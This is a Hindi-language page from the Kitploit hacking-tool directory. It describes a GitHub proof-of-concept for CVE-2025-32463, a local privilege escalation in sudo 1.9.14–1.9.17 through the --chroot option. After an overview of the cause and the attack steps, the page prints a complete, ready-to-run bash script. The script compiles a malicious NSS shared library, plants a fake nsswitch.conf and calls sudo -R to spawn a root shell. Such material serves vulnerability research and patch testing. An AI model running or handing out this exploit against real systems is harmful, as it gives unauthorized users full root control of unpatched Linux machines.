Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463 — CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo 1.9.14-1.9.17 में chroot गलत कॉन्फ़िगरेशन और दुर्भावनापूर्ण NSS लाइब्रेरी इंजेक्शन के माध्यम से स्थानीय विशेषाधिकार वृद्धि। | Kitploit
उपकरण/GitHubGitHub/mr-alperen/cve-2025-32463
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षाबाइनरी शोषण
GitHubmr-alperen/cve-2025-32463

CVE-2025-32463

CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo 1.9.14-1.9.17 में chroot गलत कॉन्फ़िगरेशन और दुर्भावनापूर्ण NSS लाइब्रेरी इंजेक्शन के माध्यम से स्थानीय विशेषाधिकार वृद्धि।

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📌 CVE-2025-32463 — Sudo --chroot स्थानीय विशेषाधिकार वृद्धि

ExploitDB ID: 52352


🧠 सामान्य अवलोकन

यह रिपॉजिटरी एक महत्वपूर्ण स्थानीय विशेषाधिकार वृद्धि (LPE) कमजोरी का दस्तावेजीकरण करता है जो Sudo 1.9.14 – 1.9.17 संस्करणों को प्रभावित करती है।

कमजोरी sudo -R (--chroot) विकल्प के गलत कार्यान्वयन के कारण होती है और यह हमलावर को sudoers फ़ाइल में अनुमति न होने पर भी, रूट विशेषाधिकारों के साथ कमांड चलाने की अनुमति देती है।

🔥 परिणाम: अनधिकृत उपयोगकर्ता → रूट शेल


🧩 प्रभावित घटक

  • सॉफ़्टवेयर: sudo
  • प्रभावित संस्करण:
    • 1.9.14
    • 1.9.15
    • 1.9.16
    • 1.9.17
  • CVE ID: CVE-2025-32463
  • प्लेटफ़ॉर्म: Linux (विशेष रूप से NSS का उपयोग करने वाले सिस्टम)
  • परीक्षित सिस्टम: Kali Rolling 2025

⚙️ कमजोरी का तकनीकी कारण

Sudo का --chroot (-R) पैरामीटर उपयोगकर्ता को अपने द्वारा निर्दिष्ट एक रूट निर्देशिका के अंतर्गत कमांड चलाने की अनुमति देता है।

हालांकि sudo 1.9.14 के साथ किए गए एक बदलाव के परिणामस्वरूप:

  • sudoers फ़ाइल अभी तक पूरी तरह से सत्यापित नहीं की गई है
  • chroot() कॉल उपयोगकर्ता द्वारा निर्दिष्ट निर्देशिका के माध्यम से की जाती है

यह स्थिति हमलावर को स्वयं द्वारा बनाई गई नकली:

/etc/nsswitch.conf

फ़ाइल के माध्यम से एक दुर्भावनापूर्ण NSS लाइब्रेरी (libnss_*.so) को रूट विशेषाधिकारों के साथ लोड करने का कारण बनता है।


🧨 हमला परिदृश्य (सारांश)

  1. एक अस्थायी निर्देशिका बनाई जाती है
  2. एक नकली nsswitch.conf तैयार किया जाता है
  3. एक दुर्भावनापूर्ण NSS साझा लाइब्रेरी संकलित की जाती है
  4. sudo -R <dir> <command> कॉल किया जाता है
  5. NSS लाइब्रेरी रूट विशेषाधिकारों के साथ लोड होती है
  6. रूट शेल प्राप्त होता है 🚀

🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

⚠️ केवल शिक्षा और परीक्षण वातावरण में उपयोग करें

root@kitploit:~
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot
टूल डाउनलोड करें